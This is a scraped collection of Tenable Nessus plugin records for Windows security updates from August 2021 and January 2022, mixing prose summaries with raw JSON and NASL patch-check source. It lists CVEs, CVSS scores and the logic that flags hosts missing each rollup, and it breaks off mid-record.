"CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text itself is copyright (C) Microsoft Corporation.

Nessus plugin 152435: KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)
Plugin version 1.10; vulnerability, patch and plugin publication date 2021/08/10; last modified 2022/04/07. Plugin type: local check, family "Windows : Microsoft Bulletins". Copyright (C) 2021-2022 Tenable, Inc.
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Description: The remote Windows host is missing security update 5005030. It is, therefore, affected by multiple vulnerabilities:
 - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)
 - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)
 - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)
 - A memory corruption vulnerability exists. An attacker can exploit this to corrupt memory and cause unexpected behaviour within the system/application. (CVE-2021-34480)
 - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)
Solution: Apply Cumulative Update KB5005030.
See also: https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a (plugin link: http://www.nessus.org/u?34b43ea5)
CVSS: v2 base AV:N/AC:L/Au:N/C:P/I:P/A:P, temporal E:H/RL:OF/RC:C; v3.0 base AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, temporal E:H/RL:O/RC:C; score source CVE-2021-36936. STIG severity I.
Exploitability: exploits are available; exploited by malware: true.
Cross-references: MSKB 5005030; MSFT MS21-5005030; IAVA 2021-A-0373-S, 2021-A-0374-S; CISA Known Exploited Vulnerabilities catalogue dates 2021/11/17, 2022/04/18, 2022/04/21.
Detection logic: after confirming the Windows 10 service-pack range and an accessible system-drive share, the plugin calls smb_check_rollup for OS 10, build 17763, rollup date 08_2021 and rollup KB 5005030; if the rollup is missing it sets SMB/Missing/MS21-08 and reports a security hole, otherwise it audits the host as not affected.

Nessus plugin 156627: KB5009621: Windows 7 and Windows Server 2008 R2 Security Update (January 2022)
Plugin ID SMB_NT_MS22_JAN_5009621.NASL, version 1.9; published 2022-01-11; last modified 2022-08-30; last seen 2023-05-20. Plugin type: local check, family "Windows : Microsoft Bulletins". CPE cpe:/o:microsoft:windows. Copyright (C) 2022 Tenable, Inc. Reference: https://www.tenable.com/plugins/nessus/156627
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Description: The remote Windows host is missing security update 5009621. It is, therefore, affected by multiple vulnerabilities:
 - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)
 - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)
 - A security feature bypass vulnerability exists. An attacker can exploit this to bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)
 - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)
 - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)
 - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)
Solution: Apply Security Update 5009621 or Cumulative Update 5009610.
See also: https://support.microsoft.com/en-us/help/5009610 and https://support.microsoft.com/en-us/help/5009621
CVSS: v2 base AV:N/AC:M/Au:N/C:C/I:C/A:C, temporal E:H/RL:OF/RC:C (score source CVE-2022-21851); v3.0 base AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, temporal E:H/RL:O/RC:C (score source CVE-2022-21922). STIG severity I.
Exploitability: exploits are available; exploited by malware: true.
Cross-references: MSFT MS22-5009610, MS22-5009621; IAVA 2022-A-0012-S, 2022-A-0016-S; CISA Known Exploited Vulnerabilities catalogue date 2022/05/16.
Detection logic: checks Windows 7 SP1 (OS 6.1) with smb_check_rollup for rollup date 01_2022 and rollup KBs 5009621 or 5009610; a missing rollup sets SMB/Missing/MS22-01 and reports a security hole, otherwise the host is audited as not affected.

Nessus plugin 156626: KB5009619: Windows Server 2012 Security Update (January 2022)
Plugin ID SMB_NT_MS22_JAN_5009619.NASL, version 1.8; published 2022-01-11; last modified 2022-05-06; last seen 2023-05-18. Plugin type: local check, family "Windows : Microsoft Bulletins". CPE cpe:/o:microsoft:windows. Copyright (C) 2022 Tenable, Inc. Reference: https://www.tenable.com/plugins/nessus/156626
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Description: The remote Windows host is missing security update 5009619. It is, therefore, affected by multiple vulnerabilities:
 - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)
 - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)
 - A security feature bypass vulnerability exists. An attacker can exploit this to bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)
 - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)
 - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)
 - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)
Solution: Apply Security Update 5009619 or Cumulative Update 5009586.
See also: https://support.microsoft.com/en-us/help/5009619 and https://support.microsoft.com/en-us/help/5009586
CVSS: v2 base AV:N/AC:M/Au:N/C:C/I:C/A:C, temporal E:H/RL:OF/RC:C (score source CVE-2022-21851); v3.0 base AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, temporal E:H/RL:O/RC:C (score source CVE-2022-21922). STIG severity I.
Exploitability: exploits are available; exploited by malware: true.
Cross-references: MSKB 5009586, 5009619; MSFT MS22-5009586, MS22-5009619; IAVA 2022-A-0012-S, 2022-A-0016-S; CISA Known Exploited Vulnerabilities catalogue date 2022/05/16.
Detection logic: checks Windows Server 2012 (OS 6.2, SP 0) with smb_check_rollup for rollup date 01_2022 and rollup KBs 5009619 or 5009586; a missing rollup sets SMB/Missing/MS22-01 and reports a security hole, otherwise the host is audited as not affected.

Nessus plugin 156624: KB5009595: Windows 8.1 and Windows Server 2012 R2 Security Updates (January 2022)
Plugin ID SMB_NT_MS22_JAN_5009595.NASL, version 1.9; published 2022-01-11; last modified 2023-09-22; last seen 2023-09-24. Plugin type: local check, family "Windows : Microsoft Bulletins". CPE cpe:/o:microsoft:windows. Copyright (C) 2022-2023 Tenable, Inc. Reference: https://www.tenable.com/plugins/nessus/156624
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Description: The remote Windows host is missing security update 5009595 or cumulative update 5009624. It is, therefore, affected by multiple vulnerabilities:
 - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)
 - A security feature bypass vulnerability exists. An attacker can exploit this to bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-21894, CVE-2022-21899, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)
 - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21864, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21875, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)
 - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)
 - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)
 - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)
Solution: Apply Security Only update KB5009595 or Cumulative Update KB5009624.
See also: https://support.microsoft.com/en-us/help/5009595 and https://support.microsoft.com/en-us/help/5009624
CVSS: v2 base AV:N/AC:M/Au:N/C:C/I:C/A:C, temporal E:H/RL:OF/RC:C (score source CVE-2022-21851); v3.0 base AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, temporal E:H/RL:O/RC:C (score source CVE-2022-21922). STIG severity I.
Exploitability: exploits are available; exploited by malware: true.
Cross-references: MSKB 5009595, 5009624; MSFT MS22-5009595, MS22-5009624; IAVA 2022-A-0012-S, 2022-A-0016-S; CISA Known Exploited Vulnerabilities catalogue date 2022/05/16.
Detection logic: checks Windows 8.1 / Server 2012 R2 (OS 6.3, SP 0) with smb_check_rollup for rollup date 01_2022 and rollup KBs 5009624 or 5009595; a missing rollup sets SMB/Missing/MS22-01 and reports a security hole, otherwise the host is audited as not affected.

Nessus plugin 156623: KB5009585: Windows 10 LTS 1507 Security Updates (January 2022)
Plugin ID SMB_NT_MS22_JAN_5009585.NASL, version 1.8; published 2022-01-11; last modified 2022-04-26; last seen 2023-05-18. CPE cpe:/o:microsoft:windows. Reference: https://www.tenable.com/plugins/nessus/156623
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Description: The remote Windows host is missing security update 5009585. It is, therefore, affected by multiple vulnerabilities:
 - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21962, CVE-2022-21959, CVE-2022-21963, CVE-2022-21960, CVE-2022-21928, CVE-2022-21874, CVE-2022-21961, CVE-2022-21958, CVE-2022-21893, CVE-2022-21892, CVE-2022-21878, CVE-2022-21851, CVE-2022-21850, CVE-2022-21849, CVE-2022-21922)
 - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-21908, CVE-2022-21903, CVE-2022-21901, CVE-2022-21897, CVE-2022-21885, CVE-2022-21881, CVE-2022-21875, CVE-2022-21873, CVE-2022-21870, CVE-2022-21868, CVE-2022-21867, CVE-2022-21866, CVE-2022-21864, CVE-2022-21862, CVE-2022-21860, CVE-2022-21859, CVE-2022-21857, CVE-2022-21838, CVE-2022-21835, CVE-2022-21834, CVE-2022-21833, CVE-2022-21914, CVE-2022-21895, CVE-2022-21916, CVE-2022-21919, CVE-2022-21871, CVE-2022-21920)
 - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)
Cross-references: MSKB 5009585; MSFT MS22-5009585; IAVA 2022-A-0012-S, 2022-A-0016-S; CISA Known Exploited Vulnerabilities catalogue date 2022/05/16.
An attacker can exploit this issue to cause the affected component to deny system or application services.\n (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, \n CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009585\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009585\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009585'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:'10240',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009585])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:17", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009566: Windows 11 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009566.NASL", "href": "https://www.tenable.com/plugins/nessus/156622", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. 
\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156622);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21887\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009566\");\n script_xref(name:\"MSFT\", value:\"MS22-5009566\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009566: Windows 11 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009566 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009566');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'22000',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009566])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": 
{"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:40:12", "description": "The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny 